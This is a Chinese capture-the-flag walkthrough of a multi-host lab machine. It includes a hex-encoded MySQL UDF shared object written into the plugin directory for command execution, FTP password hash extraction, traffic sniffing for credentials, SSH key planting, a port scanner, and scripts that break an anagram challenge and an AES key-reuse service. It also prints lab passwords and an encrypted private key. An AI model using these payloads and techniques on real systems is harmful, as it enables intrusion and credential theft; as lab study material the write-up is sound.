00000000000000001b0000000700000002000000000000003802000000000000380200000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000600200000000000060020000000000002800000000000000030000000000000008000000000000000000000000000000380000000b000000020000000000000088020000000000008802000000000000c00000000000000004000000010000000800000000000000180000000000000040000000030000000200000000000000480300000000000048030000000000008f0000000000000000000000000000000100000000000000000000000000000048000000ffffff6f0200000000000000d803000000000000d803000000000000100000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000e803000000000000e80300000000000020000000000000000400000001000000080000000000000000000000000000006400000004000000020000000000000008040000000000000804000000000000a8000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000b004000000000000b004000000000000180000000000000003000000140000000800000000000000180000000000000078000000010000000600000000000000001000000000000000100000000000001700000000000000000000000000000004000000000000000000000000000000730000000100000006000000000000002010000000000000201000000000000020000000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000401000000000000040100000000000000800000000000000000000000000000008000000000000000800000000000000870000000100000006000000000000005010000000000000501000000000000010010000000000000000000000000000100000000000000000000000000000008d00000001000000060000000000000060110000000000006011000000000000090000000000000000000000000000000400000000000000000000000000000093000000010000000200000000000000002000000000000000200000000000002c00000000000000000000000000000004000000000000000000000000000000a1000000010000000200000000000000302000000000000030200000000000009c00000000000000000000000000000008000000000000000000000000000000ab0000000e0000000300000000000000003e000000000000002e0000000000000800000000000000000000000000000008000000000000000800000000000000b70000000f0000000300000000000000083e000000000000082e0000000000000800000000000000000000000000000008000000000000000800000000000000c3000000060000000300000000000000103e000000000000102e000000000000d00100000000000004000000000000000800000000000000100000000000000082000000010000000300000000000000e03f000000000000e02f0000000000002000000000000000000000000000000008000000000000000800000000000000cc000000010000000300000000000000004000000000000000300000000000002000000000000000000000000000000008000000000000000800000000000000d5000000010000000300000000000000204000000000000020300000000000000800000000000000000000000000000008000000000000000000000000000000db000000080000000300000000000000284000000000000028300000000000000800000000000000000000000000000001000000000000000000000000000000e0000000010000003000000000000000000000000000000028300000000000001c00000000000000000000000000000001000000000000000100000000000000e9000000010000000000000000000000000000000000000044300000000000003000000000000000000000000000000001000000000000000000000000000000f8000000010000000000000000000000000000000000000074300000000000009b040000000000000000000000000000010000000000000000000000000000000401000001000000000000000000000000000000000000000f350000000000002c010000000000000000000000000000010000000000000000000000000000001201000001000000000000000000000000000000000000003b360000000000002a010000000000000000000000000000010000000000000000000000000000001e010000010000003000000000000000000000000000000065370000000000000e03000000000000000000000000000001000000000000000100000000000000010000000200000000000000000000000000000000000000783a00000000000028050000000000001e0000003000000008000000000000001800000000000000090000000300000000000000000000000000000000000000a03f000000000000880100000000000000000000000000000100000000000000000000000000000011000000030000000000000000000000000000000000000028410000000000002901000000000000000000000000000001000000000000000000000000000000
使用以下命令将其保存到目标服务器的磁盘上
SELECT x'上面编码' INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'
然后我用新创建的库创建了一个新函数
MySQL [(none)]> create function do_cmd returns integer soname "raptor.so"; Query OK, 0 rows affected (0.002 sec)
好像执行成功
现在我们端口转发22端口出来
重置root登录密码
好,已经登录成功了
找到了一个flag,看来不是这个
查看本地开放的端口,就是pure-ftp有可疑,毕竟只有21端口咱们没有使用到
找到了FTP的密码
root@db:~# cat /etc/pure-ftpd/pureftpd.passwd celes:$1$LwZNkFH0$8rq4AbiYLXkfSMPXB1psV/:1000:1000::/var/log/./::::::::::::
咱们根目录有一个叫.words.txt文件,可能是密码表,使用john进行爆破,还是找不到密码
其实有个问题很奇怪的,正常来说,一个靶机就只有一张网卡,但是这个靶机就不同,有两张网卡,而且是不同的网段
于是,我抓一下eth1网卡的流量,看到有人登录ftp
以十六进制的方式查看,找到了ftp账号和密码,他们使用的用户名celes和密码登录im22BF4HXn01
ssh登录上去
可以看到这是ftp连接脚本
在操作历史记录里面找到一个可疑操作,这是一个python图片隐写术的库
celes@dev1:~$ cat .bash_history stepic --help
也就是说,图片是关键,我们找到图片kvasir.png,使用xxd导出图片
还原图片
root@kali:/tmp# cat k.hex | xxd -r -p > k.jpg
一张很诡异的外星人图片,虽然是打不开
使用stepic,我们可以从图像中检索一些隐藏的数据k.png。(pip3 install stepic,pip不可以),这样就找到了一串十六进制的字符串
root@kali:/tmp# stepic -i k.jpg -d 89504e470d0a1a0a0000000d494844520000012200000122010300000067704df500000006504c5445ffffff00000055c2d37e00000104494441540899ed98c90dc32010459152804b72eb2ec9054422304bc089655f180ec9fb0730f07cfa9a0552420821f43fcaa6674aeb5e96dbe23b1b5434a58be559bf1e59befa03a848aa5ab22de690f2d530a8895473086a365500e7a1265132b5b3bbfc05358e7a57640b919bba0d358eeab55c9c418da7cc0df1a576a2792fa561ad035434a5920b808588d974e215d4584acff4065626ffe9db47a8e194eec805a00d7621830aa6acffd40c95d5a6fa27d404cae555e13475410550e6cca113ed72145424a56ee8ab4f8989ecb5196a02d5bdfa2477e83333410553d97ba093cc04154c89a439ba880ea881944c2d3aea0a6a0e75acc8528c4550e1144208a15fd70b88df9bb4ae0a3dc20000000049454e44ae426082
接着生成文件
echo 89504e470d0a1a0a0000000d494844520000012200000122010300000067704df500000006504c5445ffffff00000055c2d37e00000104494441540899ed98c90dc32010459152804b72eb2ec9054422304bc089655f180ec9fb0730f07cfa9a0552420821f43fcaa6674aeb5e96dbe23b1b5434a58be559bf1e59befa03a848aa5ab22de690f2d530a8895473086a365500e7a1265132b5b3bbfc05358e7a57640b919bba0d358eeab55c9c418da7cc0df1a576a2792fa561ad035434a5920b808588d974e215d4584acff4065626ffe9db47a8e194eec805a00d7621830aa6acffd40c95d5a6fa27d404cae555e13475410550e6cca113ed72145424a56ee8ab4f8989ecb5196a02d5bdfa2477e83333410553d97ba093cc04154c89a439ba880ea881944c2d3aea0a6a0e75acc8528c4550e1144208a15fd70b88df9bb4ae0a3dc20000000049454e44ae426082 | xxd -r -p > kvasir.png
因此,我们还有另一个图像文件。在默认查看器中打开会kali导致错误,拖到windows环境下就可以看到图片
解析二维码的内容,Nk9yY31hva8q
登录时celes,我们收到邮件通知,我们去查看一下有什么邮件
在db主机那里找了terra的服务器,IP是192.168.3.50
找了个扫描器的脚本,查看这台服务器开放了那个端口
#!/usr/bin/env python
from socket import *
if __name__ == '__main__':
target = raw_input('Enter host to scan: ')
targetIP = gethostbyname(target)
print 'Starting scan on host ', targetIP
#scan reserved ports
for i in range(0, 65535):
s = socket(AF_INET, SOCK_STREAM)
result = s.connect_ex((targetIP, i))
if(result == 0) :
print 'Port %d: OPEN' % (i,)
s.close()
开放了22,4444端口
使用上面的密码登录ssh,发现密码错误
nc查看一下4444端口
回想起来,我记得我们在目标上找到了一个词表192.168.2.200。略过列表.words.txt,我注意到上面列表中的一项匹配。snaaa是的字谜sanaa。同样obner是的字谜borne。
EXP脚本
from socket import socket
def isAnagram(str1, str2):
str1_list = list(str1)
str1_list.sort()
str2_list = list(str2)
str2_list.sort()
return (str1_list == str2_list)
words = list(open('.words.txt', 'r'))
for index,word in enumerate(words):
words[index] = word.strip()
sock = socket()
sock.connect(('192.168.3.50', 4444))
data = True
while data:
data = sock.recv(4096)
if 'Solve:' in data:
question = data.split('Solve:')[1].strip()
answer = ''
for word in words:
if isAnagram(question, word):
answer = word
print "'%s' = '%s'"%(question, answer)
sock.send("%s\n"%answer)
else:
print data
执行之后结果显示如下,
root@db:~# python exp.py 'vnetaimidnoe' = 'nonmediative' 'ikrgmiia' = 'kirigami' 'enosrssids' = 'drossiness' 'doarnbdiar' = 'drainboard' 'yhsdediuct' = 'thucydides' 'ereoipn' = 'pereion' 'porcgahogil' = 'logographic' 'ihavcn' = 'chavin' 'tk1m0gi' = 'g0tmi1k' 'ansaa' = 'sanaa' 'tovedde' = 'devoted' 'fepirsacluyil' = 'superficially' 'riunsoaclmti' = 'matriclinous' 'suhtca' = 'cushat' 'tdovede' = 'devoted' 'mpsinace' = 'spanemic' 'ufcmmorliu' = 'cumuliform' 'fdrirte' = 'drifter' 'yilotnifnac' = 'nonfacility' 'thkc3e' = 'teh3ck' 'aredm' = 'dream' 'dyur' = 'rudy' 'mpeouinkrsja' = 'superkojiman' 'hseoinmrss' = 'romishness' 'tupndudee' = 'undeputed' 'sgsprruocyhye' = 'psychosurgery' 'ibyfoiitlrpta' = 'profitability' 'bngidreud' = 'brundidge' 'rdrtife' = 'drifter' 'ortiaamenc' = 'aeromantic' 'uynnd' = 'dunny' 'otnaecirma' = 'aeromantic' 'lrciliergvan' = 'invercargill' 'ebeelli' = 'libelee' 'cntungenii' = 'unenticing' 'eureresccd' = 'recrudesce' 'resrabba' = 'barrebas' 'danmniiveeot' = 'nonmediative' 'rotcheir' = 'torchier' 'ealrguba' = 'arguable' 'midihlerk' = 'kriemhild' 'vtoeded' = 'devoted' 'eluiapyrficls' = 'superficially' 'luiironatsmc' = 'matriclinous' '3ktehc' = 'teh3ck' 'aplnaterenpa' = 'lappeenranta' 'iuthddeysc' = 'thucydides' 'dctrteoihce' = 'ricochetted' 'sasstiida' = 'diastasis' 'ohcrigalgpo' = 'logographic' 'tssecremie' = 'semisecret' 'riaibypltoitf' = 'profitability' 'icgtnnneui' = 'unenticing' 'onrmgelrsei' = 'mongreliser' 'zstueh' = 'zethus' 'mrnimotcdeio' = 'monodimetric' 'rteearcu' = 'creature' 'vatliqecuoiinarof' = 'overqualification' 'evaitdari' = 'radiative' 'perunreces' = 'precensure' Score: 120 Time: 0.04 secs You're a winner LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQc**jLVR5cGU6IDQsRU5DUllQVEVECkRFSy1JbmZvOiBBRVMtMTI4LUNCQyw3Njg0MTgyMkFCOUU3NzJGRDFENjUzRjYxNzlGMEU0RAoKT3JFTTJvY25oSEtnNW51SDdwczFDb09KQ2loYXNtRkpLTE9WTk5ZRk9oR0tVb2pQWUV0YTV5T2hJc2tmMGgwcgpTbyt4VkRLNjdHM0RsZ3ltVVYzRHhHZml6TGZadmh4UVJDOFF5MG1mNE4rbWlZa3ZmMk5hRnRhdHBOY2pLNXBNClV5NlFTRk1PQzhhS3BlMEZMNlVHRFJKUTVHU0c0RGxKckxVSkJNdm5TTHRZWkhsYVdBSUNLYlhmcFhWNFNUd3YKSjBEOGg5UnRsUkpoTENLNWVLZ3VwWUNRSWlHUVdnM1B2WnBYazlra2pYaG1PUXdVWW9DUmwzbDRqNXpsbkZjVApQNlU5VVBoUnEvQ2s0UXJrMmRHeEZmcHBRZDl4VytiNFBXamlTQ2lrTEYzUTBoZk5OdkVidTRvdW5BZ1l3UEZICmpPWEhKcXhWb2cvcFp6OVk4WGZTUDNoejlBWUhXZkkyaUM5Q25rN2JvUmNPdittY2dFZVdXa1lyVnNjT2l2WWoKOU4yeGlOcDRHSCtOSUc4bW0vTGRsN2pRTWwvVnJyNWN4M2ZYak9lem1nc1NrQVk0Q2NzcHdLc1NYSzhHTC9iTwpoVDZwS1dmTDZVSTh3VWdwSTdLaGdLK0FPS3VTL1hQWVRTZHorMFJKeE5GU0xPRk5jalJ0TCtOVzBValBxNUpoCkRpYStwdzVxQitsbGx4Z2FOMFdCUXNrSUZRcHBwUG93d2pHOEpnOGpKQmpTWWozcjRMSXJad0pTcGN2b0JpVUEKb0NxblFVTXRYbE1oOS9DdkJCR3MxK0pWY2prSW5CZGU5NDVWK2VqaFA2R1BZanU0VFFWN0I3MGQ3YUVXME9FbQowZDduck9XL0xDWXBzVi9ONXJxVnNHbFR2d2pKT**3eU1xRVo5RTA5Z3VNNWVMNENFUFBtcDlaRGV5MmZCQUd3CnE3blNyOHE2SHNmNGQrWVBSKzkwRWZNSlJlcUkzczFGUW9UdngrUGFGUGlLdzdkZkhGQ2dMc2NYY1hjb2duTHoKY0IwbG5lbUkrY0ZtZlk3NEYxZVlMM2Z3Skl3U1JnSzg1WGMyTXk4c3FKejFpemo2SWxPMmtRMWpMa3JoSk9aOApYK3AvOXc1ekEweDJmYmpwcEhhYytZb0pmeVB5WVhqa3BpZ0RQakhYaFJpdDJxblVySGZEYzBGamg1QUtOVTJLCk1VL3l3WEdFZzZ3MENwcEs5SkJvMHUveEpsaFQvak9XTmlNNFlaalhsaFF6a3h5ZWJ2YnlSUzZTbGhsbzE0MmwKZ011TVV2UG4xZkFlbmlyNkFGd3kycmxrdFE1L2E4ejJWQ3dQa05BNDBNSW1TSE1XUlNGY**Eak01endyMjRH***OMHBJMUJDbUNzZjBtc3ZFd0xoZGNWbmhKWTdCZzRpem01YlgrQXJWL3ltTE9reWJLOGNoejVmcnlYY2plVjFxCml6SmUyQVhaazEvOGhZODB0dkpXanhVRWZuZ3V5b296UWY1VDc0bW41YWV6OUpnR1dNcXpwZkt3WjZMeDVjVGcKWnUrbStyeWFrQlBGalV0dDA0bENZQ0NLV1F6UGhnSXI1eFVGeDYyaENHaGg2Vzh0U0lCNms3SHB1bjEyM0dRMAp1VCtSMEVyWUE1R2R5eDQ0RlpFYXRaM3JYQ3BWbUpsbENUV1VxQnVhSFlBdGNaVGhUVFpmeFJGSHkwMklUNkZXClBMQ1ovWE4yRStUZHRrWG1GY1RYUnNndHlBLzVWWHNUV1dtUmNIY3p2NWc1WWNRM3BIczNNaFN4c1dTZFR6LzgKUll6bXhPbkNqWldYYVVlMFhiN0ZqQS9ldm1wWHN5aENoR2J2cDBLMGhaRmNNZXN6RkthOEs0cEFlZGN5RzMxbgo0K0hoSW1uRXBMWlFPWGhmWGxrS01RWHJCeXM3aGtvbmtEcDU3VnFoK0lJWkxHelZtZlRWRWoyV2hjLzBZK0dJCkRNcGgwWnZURytKZ3YxTE8zU2w4MlJ6bTFqVWt6RUlaTkl4WWVTR3JaZjZDaFZMUGE4NWF4cXc1RVZOQ3hZVWcKSkFxZyt1ZDZ4SU85b2JpZHh6STJyTGZieGNwTXVyODBuYjRjcllNTm0wOXlQUWFza25nSy80SWptblBMZVRpaAotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=
上面这段是base64加密,我们解密一下,对此进行解码会得到一个rsa私钥。
-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,76841822AB9E772FD1D653F6179F0E4D OrEM2ocnhHKg5nuH7ps1CoOJCihasmFJKLOVNNYFOhGKUojPYEta5yOhIskf0h0r So+xVDK67G3DlgymUV3DxGfizLfZvhxQRC8Qy0mf4N+miYkvf2NaFtatpNcjK5pM Uy6QSFMOC8aKpe0FL6UGDRJQ5GSG4DlJrLUJBMvnSLtYZHlaWAICKbXfpXV4STwv J0D8h9RtlRJhLCK5eKgupYCQIiGQWg3PvZpXk9kkjXhmOQwUYoCRl3l4j5zlnFcT P6U9UPhRq/Ck4Qrk2dGxFfppQd9xW+b4PWjiSCikLF3Q0hfNNvEbu4ounAgYwPFH jOXHJqxVog/pZz9Y8XfSP3hz9AYHWfI2iC9Cnk7boRcOv+mcgEeWWkYrVscOivYj 9N2xiNp4GH+NIG8mm/Ldl7jQMl/Vrr5cx3fXjOezmgsSkAY4CcspwKsSXK8GL/bO hT6pKWfL6UI8wUgpI7KhgK+AOKuS/XPYTSdz+0RJxNFSLOFNcjRtL+NW0UjPq5Jh Dia+pw5qB+lllxgaN0WBQskIFQpppPowwjG8Jg8jJBjSYj3r4LIrZwJSpcvoBiUA oCqnQUMtXlMh9/CvBBGs1+JVcjkInBde945V+ejhP6GPYju4TQV7B70d7aEW0OEm 0d7nrOW/LCYpsV/N5rqVsGlTvwjJNowyMqEZ9E09guM5eL4CEPPmp9ZDey2fBAGw q7nSr8q6Hsf4d+YPR+90EfMJReqI3s1FQoTvx+PaFPiKw7dfHFCgLscXcXcognLz cB0lnemI+cFmfY74F1eYL3fwJIwSRgK85Xc2My8sqJz1izj6IlO2kQ1jLkrhJOZ8 X+p/9w5zA0x2fbjppHac+YoJfyPyYXjkpigDPjHXhRit2qnUrHfDc0Fjh5AKNU2K MU/ywXGEg6w0CppK9JBo0u/xJlhT/jOWNiM4YZjXlhQzkxyebvbyRS6Slhlo142l gMuMUvPn1fAenir6AFwy2rlktQ5/a8z2VCwPkNA40MImSHMWRSFboDjM5zwr24Gk N0pI1BCmCsf0msvEwLhdcVnhJY7Bg4izm5bX+ArV/ymLOkybK8chz5fryXcjeV1q izJe2AXZk1/8hY80tvJWjxUEfnguyoozQf5T74mn5aez9JgGWMqzpfKwZ6Lx5cTg Zu+m+ryakBPFjUtt04lCYCCKWQzPhgIr5xUFx62hCGhh6W8tSIB6k7Hpun123GQ0 uT+R0ErYA5Gdyx44FZEatZ3rXCpVmJllCTWUqBuaHYAtcZThTTZfxRFHy02IT6FW PLCZ/XN2E+TdtkXmFcTXRsgtyA/5VXsTWWmRcHczv5g5YcQ3pHs3MhSxsWSdTz/8 RYzmxOnCjZWXaUe0Xb7FjA/evmpXsyhChGbvp0K0hZFcMeszFKa8K4pAedcyG31n 4+HhImnEpLZQOXhfXlkKMQXrBys7hkonkDp57Vqh+IIZLGzVmfTVEj2Whc/0Y+GI DMph0ZvTG+Jgv1LO3Sl82Rzm1jUkzEIZNIxYeSGrZf6ChVLPa85axqw5EVNCxYUg JAqg+ud6xIO9obidxzI2rLfbxcpMur80nb4crYMNm09yPQaskngK/4IjmnPLeTih -----END RSA PRIVATE KEY-----
我将密钥放入文件中并保存chmod到600。然后我尝试用它来ssh作为terra来192.168.3.50。系统提示您输入密钥的密码,因为它已加密,因此我使用了之前找到的字符串- Nk9yY31hva8q。
查看一下目录,我们找到开放4444端口的脚本
登录后,我们收到了一封邮件通知。让我们看看那封邮件是什么。
按照邮件提示Locke存在端口敲门服务,IP是192.168.4.100,既然没有提示我们要敲击那个端口,我查了一下资料,原来有默认端口
开启了1111端口
原来这个1111端口就是一个shell
按照提示image是个关键
使用证书登录shell
mkdir .ssh echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ6RfCFyxxJLNPe/Dn94vaHUFvnm8Qg44CRCkhBD+V2fJPpi3DR0Bo3vUmJ2N+iPO91plE2tFjnCR0dSva33dMnHy8oNn6fm6nicIqV7enazPaEo8OE/su/GRVMzsijeqgBhd5+CBM5a9+grxfylcTfEB0jIXi4JeYON6DpQqgKvleJY/XZhAQ4Mt362n1EfhH+sJp6dyw2y1rjmxjU1e1a4mN7gdWQ9Xx6LThx7xI/k/BWFWx+nYfGvyDggqftlPC2aQPVK6+ZmjIMc0CxOioW3ZGJUT3ItCP3gZxqDHs+pSKN4dv7hP7q24Nm2OBy3hF1hl6OdQ5jH6IeJKOXrEJ terra@dev2' > .ssh/authorized_keys
登录成功后,将这个文件提取出来
提取到本地kali,解压打开
它是一个磁盘,里面有个压缩包,解压不了,需要密码
我们爆破不了密码
dd:用指定大小的块拷贝一个文件,并在拷贝的同时进行指定的转换
root@kali:/tmp# dd if=diskimage of=test.wav bs=1 skip=263168 count=405152 405152+0 records in 405152+0 records out 405152 bytes (405 kB, 396 KiB) copied, 1.36633 s, 297 kB/s
下载到本地之后,发现没有wav这个音频,可能xxd下来有些问题,只能靶机生成wav再用xxd下载到本地
声音超级难听=-=
使用audacity查看音频,发现有一串字符串,OrcWQi5VhfCo
使用这个密码解压压缩包,得到了一个密码
切换到kefka用户
我们看看该用户有没有特权命令
让我们来运行一下,没有什么回应
退出的时候,发现这个脚本用sock接受东西
我们监听一下端口,可以看出程序已经开放了1234端口
nc连接到1234端口
很快我们可以观察到以下几点:
- 加密的文本总是不同的
- 每次使用不同的键(因此如上所述)
- 输出字符串是编码字符串的十六进制表示
- 用过的钥匙很小
另外,脚本的名称建议使用WEP加密……或者至少与WEP一样糟糕:)
经过一些研究,我们可以使用密钥重用来进行攻击。关于它如何工作的几句话。
由于XOR的工作方式,如果重用同一密钥,则某些弱密码很容易受到密钥重用攻击。只要您知道一条加密消息的纯文本及其密钥,如果您发现另一条用相同密钥编码的未知消息,就可以提取其纯文本。让我们看以下内容:
encrypted_messageA= messageAXORkey
encrypted_messageB= messageBXORkey
如果我们将两者都异或会发生什么?请记住abc XOR abc = 0!
encrypted_messageA XOR encrypted_messageB = messageA XOR key XOR messageB XOR key = messageA XOR messageB
key消失了,因为key XOR key = 0。
现在假设我们知道的明文messageA并且想要找到messageB。我们需要做的就是messageA通过将整个事物与进行XOR运算来摆脱方程式的已知messageA。
messageA XOR messageB XOR messageA = messageB
再次,因为messageA XOR messageA = 0。
因此,知道需要做什么之后,我精心设计了以下脚本来快速获取我们的纯文本标志。
#!/usr/bin/python
import socket
# XOR strings function definition (ensure to pass in binary values)
#
def xor_strings(p_string1, p_string2):
return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(p_string1, p_string2))
# Initialise socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 1234))
# Get banner and instructions
sock.recv(200)
# Random, known message of the same length as the flag
# to be used later for XOR operations
message = "A" * 12
# Collections of encrypted flags and messages
flags = {}
messages = {}
while True:
# Build a list of known encrypted flags
sock.send("V\n")
encrypted_flag = sock.recv(200).strip()
flag_key = encrypted_flag[:6]
flag_value = encrypted_flag[7:]
flags[flag_key] = flag_value
# Build a list of known encrypted messages
sock.send("E " + message + "\n")
encrypted_message = sock.recv(200).strip()
message_key = encrypted_message[:6]
message_value = encrypted_message[7:]
messages[message_key] = message_value
# Find the flag key in message keys or vice versa
# (since we're building 2 lists, check both - should
# be able to find a match quicker)
if flag_key in messages:
message_value = messages[flag_key]
break
if message_key in flags:
flag_value = flags[message_key]
break
# Values are returned in hex form, so need to convert it back
# to binary for XOR
binary_message = message_value.decode("hex")
binary_flag = flag_value.decode("hex")
# XOR both encryptions together
# encrypted_message XOR encrypted_flag = message XOR key XOR flag XOR key
xor_both_result = xor_strings(binary_message, binary_flag)
# XOR above rsult with plaintext message to get the flag, because:
# key XOR key = 0; and
# message XOR message = 0; therefore:
# message XOR key XOR flag XOR key XOR message = flag
decoded_flag = xor_strings(xor_both_result, message)
print decoded_flag
sock.close()
使用脚本之后获取到密码
kefka@adm:/tmp$ sudo /opt/wep2.py & [3] 2326 kefka@adm:/tmp$ python run.py 0W6U6vwG4W1V kefka@adm:/tmp$
我们需要一个root shell!我尝试将其用作root密码,但是没有用。尝试了其他一些事情,试图找到其他特权升级点,但是没有运气。
过了一会儿,我决定考虑我们接受输入的其他内容。我决定在先前攻击的应用程序中传递字符串/opt/wep2.py。
进去之后就是一个python客户端
wep2.py
cat wep2.py
#!/usr/bin/env python
import socket, thread, random, subprocess, os
from Crypto.Cipher import AES
from encodings import hex_codec
iv_size = 6
key = os.urandom(16)
def reset_key(sock):
key = os.urandom(16)
def gen_iv():
iv_nibbles = os.urandom(iv_size).encode("hex")[0:iv_size]
iv_total = iv_nibbles+"1"*(32-len(iv_nibbles))
return iv_total.decode("hex")
def encrypt(iv, data):
pad_bytes = 16-(len(data) % 16)
if pad_bytes < 16 and pad_bytes > 0:
data = data + "X"*pad_bytes
aes = AES.new(key, AES.MODE_OFB, iv)
ciphertext = aes.encrypt(data)
if pad_bytes < 16:
ciphertext = ciphertext[0:-pad_bytes]
return ciphertext
def banner(sock):
sock.send("=============================\nCan you retrieve my secret..?\n=============================\n\nUsage:\n'V' to view the encrypted flag\n'E' to encrypt a plaintext string (e.g. 'E AAAA')\n\n")
def handler(sock, addr):
reset_key(sock)
banner(sock)
f = sock.makefile()
cmd = f.readline()
while len(cmd) != 0:
cmd = cmd.strip()
if len(cmd) == 0:
sock.send("Need a Command...\n")
break
iv = gen_iv()
if cmd[0] == "V":
ciphertext = encrypt(iv, "0W6U6vwG4W1V")
sock.send(iv.encode("hex")[0:iv_size] + ":" + ciphertext.encode("hex") + "\n")
reset_key(sock)
cmd = f.readline()
continue
elif cmd[0] == "E":
segs = cmd.split()
if len(segs) != 2 or len(segs[1]) < 1:
sock.send("Invalid Syntax\n")
else:
ciphertext = encrypt(iv, segs[1])
sock.send(iv.encode("hex")[0:iv_size] + ":" + ciphertext.encode("hex") + "\n")
cmd = f.readline()
continue
elif cmd == "0W6U6vwG4W1V":
while True:
sock.send("> ")
cmd2 = sock.recv(256)
p = subprocess.Popen(['/usr/bin/python', '-c', cmd2], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p1 = p.communicate()[0]
sock.send(p1)
done
cmd = f.readline()
continue
else:
sock.send("Invalid Command\n")
break
f.close()
sock.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
s.bind(("127.0.0.1", 1234))
s.listen(1)
sock, addr = s.accept()
handler(sock, addr)
找到了flag,不过字符串倒转了
最后flag
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者